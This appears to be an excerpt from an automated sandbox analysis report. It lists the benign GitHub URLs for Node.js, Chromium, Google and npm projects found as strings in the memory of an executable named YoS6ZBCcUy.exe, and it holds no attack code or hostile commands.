Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/TroyGoode)
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.border-boxcontent-bo
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/scheduling-apis
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/shared-element-transitions/blob/main/debugging_overflow_on_images.md.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/view-transitions/blob/main/debugging_overflow_on_images.md
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/WebAssembly/wasm-c-api/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/aawc/unrar.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/brailcom/speechd
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/brycebaril/node-stream-meter.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/supports-color
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/wrap-ansi?sponsor=1
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/conventional-changelog/standard-version):
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/denoland/deno
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/denoland/deno/blob/main/LICENSE.md.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/denoland/deno/blob/v1.29.1/ext/crypto/00_crypto.js#L195
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dominictarr/rc.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dpranke/typ.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/etingof/pyasn1
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/zstd
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/queue-microtask
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/run-parallel
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/safe-buffer
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/simple-concat
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/simple-get
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/fresc81/node-winreg
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/diff-match-patch/tree/master/javascript
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/distributed_point_functions
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/google-api-cpp-client/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/pprof/tree/master/proto
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/private-join-and-compute
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/protobuf
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/re2
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/ruy
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/securemessage
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/sentencepiece
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/shell-encryption
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/ukey2
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/wicked-good-xpath
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/woff2
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/wuffs-mirror-release-c
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/xnnpack
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/heycam/webidl/pull/946.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/inspect-js/is-core-module
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/inspect-js/is-core-module.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/inspect-js/is-date-object/blob/main/index.js#L3-L11
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/inspect-js/node-supports-preserve-symlinks-flag#readme
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/inspect-js/node-supports-preserve-symlinks-flag.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/intel/libva
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/iojs/readable-stream/issues/101)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/iojs/readable-stream/issues/102)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/iojs/readable-stream/issues/105)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/iojs/readable-stream/issues/106
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/iojs/readable-stream/issues/99)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/iojs/readable-stream/labels/wg-agenda
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/color-support.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/readable-stream/issues/16
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jesec/pkg-fetch/actions/runs/2068737927
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jesec/pkg-fetch/actions/runs/2068738228
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jesec/pkg-fetch/actions/runs/2068738548
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jesec/pkg-fetch/actions/runs/2068742592
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jesec/pkg-fetch/actions/runs/2639071916
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jesec/pkg-fetch/actions/runs/2639072106
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jesec/pkg-fetch/actions/runs/2639072371
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jesec/pkg-fetch/actions/runs/2639072571
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jonschlinkert)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/joyent/node
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/joyent/node/issues/3295.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jprichardson/node-fs-extra
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/269
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jrmuizel/qcms/tree/v4
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jsdom/webidl-conversions
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jsdom/webidl-conversions/blob/master/LICENSE.md.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/juliangruber/isarray
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/kessler/node-regedit
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/kessler/stream-slicer
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/lgeiger/node-abi/issues/54
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/1088
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/1501.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/2025.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ljharb)
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/pump
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-fs
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-fs.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mcollina/reusify#readme
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mcollina/reusify.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/micromatch/to-regex-range
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mikeal/tunnel-agent
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mysticatea/abort-controller
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/TSC/blob/master/Moderation-Policy.md
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/master/CODE_OF_CONDUCT.md
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/v10.8.0/lib/internal/errors.js
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/10673
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/19009
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2006
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2119
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/3392
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/34532
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35452
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35475
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35862
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35981
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39707
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39758
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/44985
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/49472
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/51486
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/52219
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/8871#issuecomment-250915913
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/8987
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12342
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12607
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/26334.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33229
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33515.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33661
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/3394
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34010
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34375
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34385
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35407#issuecomment-700693439
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38248
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38614)
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/43714
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/46161
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/48477#issuecomment-1604586650
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/49891#issuecomment-1744673430.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/string_decoder
